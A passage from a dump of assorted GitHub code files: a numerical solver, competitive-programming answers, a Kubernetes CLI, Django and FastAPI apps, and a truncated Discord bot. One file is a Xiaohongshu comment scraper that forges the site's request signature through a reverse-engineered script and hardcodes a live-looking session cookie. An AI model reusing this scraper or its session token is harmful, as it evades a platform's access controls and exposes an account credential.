Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Informed Regions Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Informed States Guessed'].max()-myDataFrame['States Guessed'].max(),\n\t\t\t\t\t\t\t\tmyDataFrame['Informed Regions Guessed'].max()-myDataFrame['Regions Guessed'].max(),\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t))\n\t\t\t\t\t\n\t\t\t\t\tmyDataFrame.to_csv('final.csv')\n\t\t\t\t\tos._exit(0)\n\n\n\t\t\t\t#print(\"Ontology: {0}\".format(self.msg.getOntology()))\n\t\t\t\t\n\tdef _setup(self):\n\t\tb = self.ReceiveBehav()\n\n\t\tclassifier_template = spade.Behaviour.ACLTemplate()\n\t\tclassifier_template.setOntology(\"classifierResults\")\n\t\tmsg_template = spade.Behaviour.MessageTemplate(classifier_template)\n\n\t\tself.addBehaviour(b,msg_template)\n\n","repo_name":"andpberr/dist_ai_project","sub_path":"RFCAgents.py","file_name":"RFCAgents.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3862582404","text":"from __future__ import division\nimport numpy as np\nimport scipy.sparse as spa\nimport scipy.sparse.linalg as spla\nfrom .utils import compute_trans, interpolate, pu_scale\nfrom .bases_solver import compute_bases\nfrom .corr_solver import compute_corr\nfrom . import predict_inner\nfrom .predict_inner import predict\nfrom .recon_flux import recon_flux\n\n\ndef solveMSFV(G, CG, DG, K, q, dirichlet=None, verbose=False,\n flux=False, model=None, scale=True, ret_all=False):\n \"\"\"\n Return: result [dict]\n result:\n pressure [3Darray]\n coarsepressure [3Darray]\n bases [list of csr_matrix]\n correction [csr_matrix]\n coarsesystem [dict]\n A [csr_matrix]\n C [array]\n q [array]\n \"\"\"\n\n # if verbose:\n # print 'Solving basis and correction functions...'\n\n if model is None:\n bases = compute_bases(G, CG, DG, K, verbose)\n else:\n # do the naive thing for now\n bases = compute_bases(G, CG, DG, K, verbose)\n bases = predict(bases, G, CG, DG, K, model, verbose=verbose)\n if scale:\n pu_scale(bases, DG) # in place modification\n\n corr = compute_corr(G, CG, DG, K, q, verbose)\n\n # Compute transmissibilities\n TX, TY, TZ = compute_trans(G, K)\n T = np.concatenate((TX.ravel(), TY.ravel(), TZ.ravel()))\n\n # Number of coarse cells\n N_cg = len(CG['centers'])\n\n # Coarse flux matrix\n A = spa.lil_matrix((N_cg, N_cg))\n\n # Correction vector\n C = np.zeros(N_cg)\n\n # Coarse source/sink vector\n q_cg = np.zeros(N_cg)\n\n # if verbose:\n # print 'Building coarse system of equations...'\n\n for i in range(N_cg):\n neighbors = CG['neighbors'][i] + [i]\n edges, border_in, border_out = CG['borders'][i]\n\n # Flux by basis functions\n for k in neighbors:\n basis_in = bases[k][border_in].toarray().ravel()\n basis_out = bases[k][border_out].toarray().ravel()\n A[i, k] = A[i, k] + np.dot(basis_in - basis_out, T[edges])\n\n # Flux by correction function\n corr_in = corr[border_in].toarray().ravel()\n corr_out = corr[border_out].toarray().ravel()\n C[i] = np.dot(corr_in - corr_out, T[edges])\n\n # Compute q_cg\n for i in range(N_cg):\n q_cg[i] = np.sum(q[CG['cells'][i]])\n\n # Impose boundary conditions\n if dirichlet is not None:\n large_number = 1e200\n idxs = dirichlet[:, 0].astype('int')\n vals = dirichlet[:, 1]\n A[idxs, idxs] = large_number\n q_cg[idxs] = large_number * vals\n else:\n A[0, 0] = A[0, 0] + sum(K[0, 0, 0, :])\n\n A = A.tocsr()\n\n # if verbose:\n # print 'Solving coarse system...'\n P_cg = spla.spsolve(A, q_cg - C)\n\n # if verbose:\n # print 'Interpolating solution to fine grid...'\n P = interpolate(P_cg, G, CG, bases, corr)\n\n P = np.reshape(P, (G['nz'], G['ny'], G['nx']))\n P_cg = np.reshape(P_cg, (CG['nz'], CG['ny'], CG['nx']))\n\n if flux:\n # if verbose:\n # print 'Computing flux...'\n V = recon_flux(P, G, CG, K, q)\n else:\n # if verbose:\n # print 'Skipping flux computation...'\n V = {}\n\n if ret_all:\n result = {}\n result['pressure'] = P\n result['flux'] = V\n result['pressurecoarse'] = P_cg\n result['bases'] = bases\n result['correction'] = corr\n result['coarsesystem'] = {}\n result['coarsesystem']['A'] = A\n result['coarsesystem']['C'] = C\n result['coarsesystem']['q'] = q_cg\n return result\n else:\n return P\n","repo_name":"chanshing/python_msfv","sub_path":"msfv_solver.py","file_name":"msfv_solver.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"43798430003","text":"# 25632 소수 부르기 게임\n# 31256 KB / 44 ms\n\na, b = map(int, input().split())\nc, d = map(int, input().split())\n\n# 최솟값, 최댓값\nmin_ = min(a, c)\nmax_ = max(b, d)\n\ng = [1]*(max_+1)\ncnt1 = cnt2 = 0\n\n# min~max 에라토스테네스의 체\nfor i in range(2, int(max_**0.5)+1):\n for j in range(min_, max_+1):\n if j == i:\n continue\n if g[j]:\n if j%i == 0:\n g[j] = 0\n\n# set로 각각의 소수 저장\nyt = set([i for i in range(a, b+1) if g[i]])\nyj = set([i for i in range(c, d+1) if g[i]])\n# 합집합\ns = yt.union(yj)\n# 각각 원소의 수\nyt_l = len(yt)\nyj_l = len(yj)\ns_l = len(s)\n\n# yj 차집합이 더 클 때\nif s_l - yt_l > s_l - yj_l:\n print('yj')\n# yt 차집합\nelif s_l - yt_l < s_l - yj_l:\n print('yt')\n# 같을 때 교집합 원소의 수 홀짝 판별\nelse:\n if s_l-len(yt-yj)-len(yj-yt) & 1:\n print('yt')\n else:\n print('yj')","repo_name":"KDT-02-Algorithm-Study/Algorithm-Study","sub_path":"week09_230309/25632_소수_부르기_게임/25632_정광배.py","file_name":"25632_정광배.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"13973329383","text":"def count_chars_words_lines(filename):\n with open(filename, 'r') as f:\n num_chars = 0\n num_words = 0\n num_lines = 0\n\n for line in f:\n num_lines += 1\n num_chars += len(line)\n words = line.split()\n num_words += len(words)\n return (num_chars, num_words, num_lines)\n\nfilename = 'file.txt' \ncounts = count_chars_words_lines(filename)\nprint(\"Number of characters : \", counts[0])\nprint(\"Number of words : \", counts[1])\nprint(\"Number of lines : \", counts[2])","repo_name":"imhrithik/Python-MCA","sub_path":"Q10/Q10.py","file_name":"Q10.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18322693631","text":"import sys\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef next_SW(now, prev, sn):\n notSW = {\"S\": \"W\", \"W\": \"S\"}\n if now == \"S\" and sn:\n return prev\n if now == \"S\" and 1-sn:\n return notSW[prev]\n if now == \"W\" and sn:\n return notSW[prev]\n if now == \"W\" and 1-sn:\n return prev\n\n\ndef main():\n N = NI()\n S = SI()\n D = {\"o\": 1, \"x\": 0}\n SorW = [\"S\", \"W\"]\n S = [D[s] for s in S]\n case = [\"SS\", \"SW\", \"WS\", \"WW\"]\n for T in case:\n for i in range(1, N):\n now, prev = T[i], T[i-1]\n sn, sp = S[i], S[i-1]\n T += next_SW(now, prev, sn)\n if next_SW(T[0], T[-1], S[0]) == T[1] and T[0] == T[-1]:\n print(T[:-1])\n exit()\n print(-1)\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC055/ABC055D.py","file_name":"ABC055D.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42515205775","text":"import h5py\nimport os\n\nfrom . import REFERENCE_H5\n\nROOT = os.path.dirname(os.path.abspath(__file__))\n\n\nclass BasePredictor(object):\n def __init__(self, model_dir):\n self.model_dir = model_dir\n self.reference_h5 = os.path.join(ROOT, \"..\", \"data\", REFERENCE_H5)\n\n def _get_X(self, X=None, idxs=None, head=None, tail=None):\n print(\"Getting X\")\n if X is not None:\n return X\n if idxs is not None:\n with h5py.File(self.reference_h5, \"r\") as f:\n X = f[\"Values\"][idxs]\n elif head is not None:\n with h5py.File(self.reference_h5, \"r\") as f:\n X = f[\"Values\"][:head]\n elif tail is not None:\n with h5py.File(self.reference_h5, \"r\") as f:\n X = f[\"Values\"][-tail:]\n else:\n with h5py.File(self.reference_h5, \"r\") as f:\n X = f[\"Values\"][:]\n return X\n","repo_name":"ersilia-os/eos-lite-chem","sub_path":"eoslitechem/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6703370279","text":"import getopt\nimport io\nimport sys\n\nimport k8v\n\n\ndef usage(output: io.IOBase) -> None:\n \"\"\"Display the command line usage help screen.\"\"\"\n\n with open(\"etc/usage.md\") as f:\n for line in f.readlines():\n output.write(line)\n f.close()\n\n\ndef main(argv: list) -> None:\n \"\"\"Main execution to setup the Viewer.\"\"\"\n\n viewer: k8v.viewer.Viewer = k8v.viewer.Viewer()\n try:\n opts, args = getopt.getopt(\n argv,\n \"ARtvhc:e:f:i:n:o:r:s:\",\n [\n \"all-related\",\n \"all-resources\",\n \"colors\",\n \"all-namespaces\",\n \"exclude\",\n \"file\",\n \"help\",\n \"include\",\n \"namespace\",\n \"output\",\n \"resource\",\n \"selector\",\n \"verbose\",\n ],\n )\n except getopt.GetoptError as e:\n usage(viewer.config.file)\n print(f\"ERROR: {e}\")\n print()\n sys.exit(2)\n\n for opt, arg in opts:\n # display the help\n if opt in (\"-h\", \"--help\"):\n usage(viewer.config.file)\n sys.exit()\n\n # display modes\n elif opt in (\"-c\", \"--colors\"):\n viewer.config.colors = arg\n elif opt in (\"-o\", \"--output\"):\n viewer.config.output = arg\n elif opt in (\"-v\", \"--verbose\"):\n viewer.config.verbose = True\n elif opt in (\"-f\", \"--file\"):\n viewer.config.filename = arg\n\n # namespaces\n elif opt in (\"-A\", \"--all-namespaces\"):\n viewer.config.namespaces = None\n elif opt in (\"-n\", \"--namespace\"):\n if viewer.config.namespaces is None:\n viewer.config.namespaces = []\n viewer.config.namespaces.append(arg)\n\n # search criteria\n elif opt in (\"-t\", \"--all-related\"):\n viewer.config.related = True\n elif opt in (\"-e\", \"--exclude\"):\n viewer.config.excludes.append(arg)\n elif opt in (\"-i\", \"--include\"):\n viewer.config.includes.append(arg)\n elif opt in (\"-R\", \"--all-resources\"):\n viewer.config.resources = None\n elif opt in (\"-r\", \"--resource\"):\n for type in k8v.resource_types.ResourceType:\n if arg in type.value:\n viewer.config.resources.append(type)\n elif opt in (\"-s\", \"--selector\"):\n key, value = arg.split(\"=\")\n viewer.config.selectors[key] = value\n\n # any remaining arguments are filter queries\n for arg in args:\n viewer.config.includes.append(arg)\n\n # Search for matching resources and display them\n viewer.view()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"jasonhanks/k8v","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14719613484","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/9/14 13:18\n# @Author : yogurt\n\nimport json\nimport pprint\nimport re\nimport time\nimport execjs\nimport requests\n\njs = execjs.compile(open(r'./redbook.js', 'r', encoding='utf-8').read())\n\n# q = js.call('get_xs','/api/sns/web/v2/comment/page?note_id=64ddde49000000000103ccaa&cursor=&top_comment_id=', '', '186ca73ccb9ht3l50qn35jga5z39zuv4j3l7i80a850000380091')\n# print(q)\n\n\ndef requses_spider(url, method, headers=None, params=None,timeout=None,proxies=None, default=''):\n count = 0\n while True:\n try:\n res = getattr(requests, method)(url=url, headers=headers, params=params,proxies=proxies, timeout=timeout)\n break\n except Exception as e:\n if count > 4:\n print(\"程序请求异常次数过多请联系程序员 13217252129\",default, e)\n time.sleep(2)\n return res\n\n# 初始化请求,设置加密headers\ndef init(url, cookie):\n headers = {\n 'accept': 'application/json, text/plain, */*',\n 'accept-language': 'zh-CN,zh;q=0.9',\n 'referer': 'https://www.xiaohongshu.com/',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',\n }\n headers['cookie'] = cookie\n # 获取加密 a1\n a1_list = re.findall('a1=(.*?);', cookie)\n # 获取url 加密参数\n encry_url = url.split('xiaohongshu.com')[-1]\n if a1_list:\n xs = js.call('get_xs', encry_url, '', a1_list[0])\n headers['x-s'] = xs['X-s']\n else:\n print(\"复制提供的cookie有错误请重新,复制cookie链接\")\n exit()\n return headers\ndef flag_lenlist(list_data:list):\n if len(list_data):\n return list_data\n else:\n return False\ndef paser_talking(text,cookie, url):\n jsdata = json.loads(text)\n print(jsdata)\n list_save_data = []\n if jsdata['code'] == 0:\n first_comments =jsdata['data']['comments']\n if flag_lenlist(first_comments):\n for first_comment in first_comments:\n json_data = {}\n json_data['用户id'] = first_comment['id']\n json_data['ip地址'] = first_comment.get('ip_location')\n json_data['一级评论'] = first_comment['content']\n json_data['点赞人数'] = first_comment['like_count']\n json_data['评论人数'] = first_comment['sub_comment_count']\n if flag_lenlist(first_comment['sub_comments']):\n list_sub = []\n for sub_comment in first_comment['sub_comments']:\n dict_sub = {}\n dict_sub['用户id'] = sub_comment['id']\n dict_sub['ip地址'] = sub_comment.get('ip_location')\n dict_sub['二级用户评论'] = sub_comment['content']\n dict_sub['点赞人数'] = sub_comment['like_count']\n dict_sub['回复用户'] = sub_comment['target_comment']['id']\n list_sub.append(dict_sub)\n json_data['二级评论信息'] = list_sub\n list_save_data.append(json_data)\n # 打印输出存储数据\n pprint.pprint(list_save_data)\n print(\"cursor\", jsdata['data']['cursor'])\n spider_title(url, cookie, jsdata['data']['cursor'])\n else:\n print(\"解析未能成功, 请尝试更换cookie后重试\", jsdata)\n exit()\n\n\ndef spider_title(url, cookie, cursor):\n req_url = 'https://edith.xiaohongshu.com/api/sns/web/v2/comment/page?note_id=' +url.split('/')[-1] + f'&cursor={cursor}&top_comment_id='\n print(req_url)\n # 获取帖子回复用户数据\n hearders = init(req_url, cookie)\n print(hearders['x-s'])\n text = requses_spider(req_url, 'get', headers=hearders).text\n paser_talking(text, cookie, url)\n\n\n\n\nif __name__ == '__main__':\n\n url = \"https://www.xiaohongshu.com/explore/64dbb998000000000b0282f4\"\n cookie = \"acw_tc=064f56ad72f8d9cdb7847c6d20367667f36d097feb36e9104025a9819f41acb1; abRequestId=3580adae-8b25-58cf-a420-addb927d0474; webBuild=3.10.6; xsecappid=xhs-pc-web; a1=18b12a2f127ov23rszma06l94hz8zlte73yqxusog50000376744; webId=05223878527e28a9f3f5ff2ff9c8413c; websectiga=2845367ec3848418062e761c09db7caf0e8b79d132ccdd1a4f8e64a11d0cac0d; gid=yYDyJ0Ji0yWiyYDyJ0Jiyq7MJWlhJqFMu608vlkK1j4xuA28Yu19dC888qWKW448SjqjKKY8; unread={%22ub%22:%2264f4014b000000001e00df56%22%2C%22ue%22:%226501be1b000000001f0063de%22%2C%22uc%22:29}; sec_poison_id=67307734-39f8-441b-a01d-ef9f62f4a36d; web_session=040069b2959d13cb7043ed3716374b347deda9\"\n # 分类讨论\n if '/explore/' in url:\n spider_title(url, cookie, '')\n # spider_main(url, cookie)","repo_name":"notallyogurt/python_spider","sub_path":"小红书评论/test_redbook.py","file_name":"test_redbook.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"40329793451","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom .models import Customer, Product, Cart, Order\nfrom .forms import CustomerRegistrationForm, ProfileForm\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\n# Products and Info\nclass ProductView(View):\n def get(self, request):\n total_items = 0\n user = request.user\n topwears = Product.objects.filter(category='TW')\n bottomwears = Product.objects.filter(category='BW')\n smartphones = Product.objects.filter(category='SP')\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n return render(request, 'app/home.html', {'topwears': topwears,\n 'bottomwears':bottomwears,\n 'smartphones':smartphones, 'total_items':total_items})\n\nclass ProductDetailView(View):\n def get(self, request, product_id):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n product = Product.objects.get(pk=product_id)\n in_cart = False\n if user.is_authenticated:\n in_cart = Cart.objects.filter(Q(product=product.id) & Q(user=request.user)).exists()\n return render(request, 'app/productdetail.html', {'product':product, 'in_cart':in_cart, 'total_items':total_items})\n\n\n\n# Products in user cart\n@login_required\ndef add_to_cart(request):\n user= request.user\n product_id = request.GET.get('prod_id')\n product = Product.objects.get(id=product_id)\n Cart(user=user, product=product).save()\n return redirect('/cart')\n\n@login_required\ndef show_cart(request):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if user.is_authenticated:\n cart = Cart.objects.filter(user=user)\n amount = 0.0\n shipping_amount = 70.0\n total_amount = 0.0\n cart_has_items = [item for item in Cart.objects.all() if item.user == user]\n if cart_has_items:\n for item in cart_has_items:\n temp = (item.quantity * item.product.discounted_price)\n amount += temp\n total_amount = amount + shipping_amount\n return render(request, 'app/addtocart.html', {'cart': cart, 'total_amount': total_amount, 'amount': amount, 'total_items':total_items})\n else:\n return render(request, 'app/emptycart.html')\n\ndef plus_cart(request):\n user = request.user\n if request.method==\"GET\":\n product_id = request.GET['product_id']\n item = Cart.objects.get(Q(product=product_id) & Q(user=request.user))\n item.quantity+=1\n item.save()\n amount = 0.0\n shipping_amount = 70.0\n cart_has_items = [item for item in Cart.objects.all() if item.user == request.user]\n for item in cart_has_items:\n temp = (item.quantity * item.product.discounted_price)\n amount += temp\n\n data = {\n 'quantity': item.quantity,\n 'amount': amount,\n 'total_amount': amount + shipping_amount,\n }\n return JsonResponse(data)\n\ndef minus_cart(request):\n user = request.user\n if request.method==\"GET\":\n product_id = request.GET['product_id']\n item = Cart.objects.get(Q(product=product_id) & Q(user=request.user))\n item.quantity-=1\n item.save()\n amount = 0.0\n shipping_amount = 70.0\n cart_has_items = [item for item in Cart.objects.all() if item.user == request.user]\n for item in cart_has_items:\n temp = (item.quantity * item.product.discounted_price)\n amount += temp\n\n data = {\n 'quantity': item.quantity,\n 'amount': amount,\n 'total_amount': amount + shipping_amount,\n }\n return JsonResponse(data)\n\ndef removeitem(request):\n total_items = 0 \n if request.method==\"GET\":\n product_id = request.GET['product_id']\n item = Cart.objects.get(Q(product=product_id) & Q(user=request.user))\n item.delete()\n amount = 0.0\n shipping_amount = 70.0\n cart_has_items = [item for item in Cart.objects.all() if item.user == request.user]\n for item in cart_has_items:\n temp = (item.quantity * item.product.discounted_price)\n amount += temp\n total_items +=1\n\n data = {\n 'amount': amount,\n 'total_amount': amount + shipping_amount,\n 'total_items':total_items,\n }\n return JsonResponse(data)\n\n@login_required\ndef checkout(request):\n user = request.user\n total_items = 0\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n addr = Customer.objects.filter(user=user)\n cart_items = Cart.objects.filter(user=user)\n amount = 0.0\n shipping_amount = 70.0\n total_amount = 0.0\n cart_has_items = [item for item in Cart.objects.all() if item.user == request.user]\n if cart_has_items:\n prices = []\n for item in cart_has_items:\n temp = (item.quantity * item.product.discounted_price)\n amount += temp\n prices.append(temp)\n total_amount = amount + shipping_amount\n return render(request, 'app/checkout.html', {'addr':addr, 'total_amount': total_amount, 'cart_items':cart_items, 'prices':prices, 'total_items':total_items})\n\ndef payment(request):\n user = request.user\n custid = request.GET.get('custid')\n customer = Customer.objects.get(id=custid)\n cart = Cart.objects.filter(user=user)\n for item in cart:\n Order(user=user, customer=customer, product=item.product, quantity=item.quantity).save()\n item.delete()\n return redirect ('orders')\n\n@login_required\ndef orders(request):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n orders = Order.objects.filter(user=user)\n return render(request, 'app/orders.html', {'orders':orders, 'total_items':total_items})\n\n\n\n# Profile and Addresses\n@method_decorator(login_required, name='dispatch')\nclass ProfileView(View):\n def get(self, request):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n form = ProfileForm()\n return render(request, 'app/profile.html', {'form':form, 'active':'btn-primary', 'total_items':total_items})\n\n def post(self, request):\n success=False\n form = ProfileForm(request.POST)\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if form.is_valid():\n name = form.cleaned_data['name']\n locality = form.cleaned_data['locality']\n city = form.cleaned_data['city']\n state = form.cleaned_data['state']\n pincode = form.cleaned_data['pincode']\n data = Customer(user=user, name=name, locality=locality, city=city, state=state, pincode=pincode)\n data.save()\n messages.success(request, 'New address added successfully')\n return render(request, 'app/profile.html', {'form':form, 'active':'btn-primary', 'total_items':total_items})\n\n@login_required\ndef address(request):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n addresses = Customer.objects.filter(user=request.user)\n return render(request, 'app/address.html', {'addresses':addresses, 'active':'btn-primary', 'total_items':total_items})\n\n@login_required\ndef delete_address(request, addr_id):\n address = Customer.objects.filter(id=addr_id)\n address.delete()\n return redirect('/address')\n\n\n\ndef buy_now(request):\n return render(request, 'app/buynow.html')\n\n\n\n# Adding products to categories & organised through filters\ndef phone(request, data=None):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if data==None:\n smartphones = Product.objects.filter(category='SP')\n elif data=='Chu' or data=='PLA' or data=='Cons':\n smartphones = Product.objects.filter(category='SP').filter(brand=data)\n elif data=='below':\n smartphones = Product.objects.filter(category='SP').filter(discounted_price__lt=10000)\n elif data=='above':\n smartphones = Product.objects.filter(category='SP').filter(discounted_price__gt=10000)\n return render(request, 'app/phone.html', {'smartphones':smartphones, 'total_items':total_items})\n\ndef topwear(request, data=None):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if data==None:\n topwears = Product.objects.filter(category='TW')\n elif data=='Zara' or data=='Nike' or data=='Adidas' or data=='XOXO' or data=='Puma':\n topwears = Product.objects.filter(category='TW').filter(brand=data)\n elif data=='below':\n topwears = Product.objects.filter(category='TW').filter(discounted_price__lt=2000)\n elif data=='above':\n topwears = Product.objects.filter(category='TW').filter(discounted_price__gt=2000)\n return render(request, 'app/topwear.html', {'topwears':topwears, 'total_items':total_items})\n\ndef bottomwear(request, data=None):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if data==None:\n bottomwears = Product.objects.filter(category='BW')\n elif data=='Zara' or data=='Supreme' or data=='Levis' or data=='Adidas':\n bottomwears = Product.objects.filter(category='BW').filter(brand=data)\n elif data=='below':\n bottomwears = Product.objects.filter(category='BW').filter(discounted_price__lt=2000)\n elif data=='above':\n bottomwears = Product.objects.filter(category='BW').filter(discounted_price__gt=2000)\n return render(request, 'app/bottomwear.html', {'bottomwears':bottomwears, 'total_items':total_items})\n\n\n\n# Registering Users\nclass CustomerRegistrationView(View):\n def get(self, request):\n form = CustomerRegistrationForm\n return render(request, 'app/customerregistration.html', {'form':form})\n\n def post(self, request):\n success=False\n form = CustomerRegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n success = True\n username = request.POST['username']\n return render(request, 'app/customerregistration.html', {'form':form, 'success':success,'username':username})\n\n","repo_name":"rishabhpundir/Day-41-47---27-Aug-06-Sept-2022","sub_path":"ecom/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29266377426","text":"from fastapi import APIRouter, Depends, status\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom starlette.requests import Request\n\nfrom src.core.db.db import get_session\nfrom src.rest.managers.watch_list_manager import WatchListManager\nfrom src.rest.permissions import is_authenticated_permission\nfrom src.rest.schemas.watchlist_schema import (\n WatchListSchema,\n WatchListInputSchema,\n WatchListWithProductSchema\n)\n\nwatchlist_router = APIRouter(tags=['watch_lists'], prefix='/watch_lists')\n\n\n@watchlist_router.get(\n '/mine/products',\n response_model=list[WatchListWithProductSchema],\n dependencies=[Depends(is_authenticated_permission)]\n)\nasync def get_product(\n request: Request,\n session: AsyncSession = Depends(get_session),\n):\n return await WatchListManager.list(session=session, filter_by={'user_id': request.user.id})\n\n\n@watchlist_router.post(\n '/mine/products',\n response_model=WatchListSchema,\n status_code=status.HTTP_201_CREATED,\n dependencies=[Depends(is_authenticated_permission)]\n)\nasync def add_product_to_watchlist(\n product_info: WatchListInputSchema,\n request: Request,\n session: AsyncSession = Depends(get_session)\n) -> WatchListSchema:\n return await WatchListManager.create(\n input_data=WatchListSchema(\n user_id=request.user.id,\n product_id=product_info.product_id\n ),\n session=session\n )\n\n\n@watchlist_router.delete(\n '/mine/products/{product_id}',\n status_code=status.HTTP_204_NO_CONTENT,\n dependencies=[Depends(is_authenticated_permission)]\n)\nasync def delete_product_from_watchlist(\n product_id: int,\n request: Request,\n session: AsyncSession = Depends(get_session)\n):\n await WatchListManager.delete(\n product_id=product_id,\n user_id=request.user.id,\n session=session\n )\n","repo_name":"dmitryzhurkovsky/cabel_torg","sub_path":"backend/src/rest/api/v1/watchlist_router.py","file_name":"watchlist_router.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"40654304129","text":"#!/usr/bin/env python3\n\nfrom rosclass1 import FourXFourBotControl\nimport rospy\n\nrospy.init_node('tx2', anonymous=True)\nffbc = FourXFourBotControl()\n\nfor i in range(10):\n ffbc.set_wheels_frequency(0, 0)\n rospy.sleep(0.5)\n","repo_name":"IgorLebed/agriculture_pest_exterminator","sub_path":"src/robot_gnss/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"17645628700","text":"from telas.tela_relatorio import TelaRelatorio\nfrom persistencia.relatorioDAO import RelatorioDAO\nfrom excecoes.valueErrorException import ValueErrorException\n\nclass ControladorRelatorio:\n def __init__(self, controlador_sistema):\n self.__controlador_sistema = controlador_sistema\n self.__tela_relatorio = TelaRelatorio()\n self.__relatorio_DAO = RelatorioDAO()\n\n @property\n def relatorio_DAO(self):\n return self.__relatorio_DAO\n \n def abre_tela_relatorios(self):\n try:\n opcoes_relatorios = {1: self.relatorio_paises,\n 2: self.relatorio_tipos_de_visto,\n 0: self.__controlador_sistema.get_controlador_gerente.iniciar_tela_gerente}\n while True:\n opcao_escolhida = self.__tela_relatorio.emissao_relatorios()\n if opcao_escolhida != 1 and opcao_escolhida != 2 and opcao_escolhida != 0:\n raise ValueErrorException\n funcao_escolhida = opcoes_relatorios[opcao_escolhida]\n return funcao_escolhida()\n except ValueErrorException as e:\n self.__tela_relatorio.mostra_mensagem(e)\n self.abre_tela_relatorios()\n\n def relatorio_paises(self):\n print('entrou no relatorio de pa��ses')\n relatorios = self.__relatorio_DAO.relatorio_paises()\n botao, values = self.__tela_relatorio.relatorio_paises(relatorios)\n if botao == 'Voltar':\n return self.abre_tela_relatorios()\n\n def relatorio_tipos_de_visto(self):\n print('entrou no relatorio de tipos de visto')\n relatorios = self.__relatorio_DAO.relatorio_tipos_de_visto()\n botao, values = self.__tela_relatorio.relatorio_tipos_de_visto(relatorios)\n if botao == 'Voltar':\n return self.abre_tela_relatorios()\n\n\n","repo_name":"juufernandaw/Visaccess","sub_path":"controladores/controlador_relatorio.py","file_name":"controlador_relatorio.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"73476119121","text":"import discord\nfrom discord.ext.commands import Context, UserConverter\nfrom disputils import BotConfirmation\nfrom utils.errors import MoneyError\nfrom utils.logs.economy import lose_money, win_money\nfrom utils.responses.Embed import Embed\nfrom utils.ddbb.economy import *\n\n\nclass Buttons(discord.ui.View):\n def __init__(self, ctx: Context, user: discord.User, money: int, embed: Embed, is_add: bool):\n super().__init__(timeout=30)\n self.ctx = ctx\n self.user = user\n self.money = money\n self.embed = embed\n self.is_add = is_add\n \n @discord.ui.button(label='Aceptar', style=discord.ButtonStyle.green)\n async def accept(self, interaction: discord.Interaction, button: discord.ui.Button):\n msg = ''\n if self.is_add:\n await win_money(self.ctx, self.user, self.money, f'Add money by {self.ctx.author.id}')\n msg = f'{int(self.money):,} 💰 **entregado** correctamente al usuario <@{self.user.id}>'\n self.embed.success()\n else:\n await lose_money(self.ctx, self.user, self.money, f'Add money by {self.ctx.author.id}')\n msg = f'{int(self.money):,} 💰 **quitado** correctamente al usuario <@{self.user.id}>'\n self.embed.success()\n self.embed.description = msg\n await interaction.response.edit_message(embed=self.embed.get_embed(), view=None)\n \n @discord.ui.button(label='Rechazar', style=discord.ButtonStyle.red)\n async def 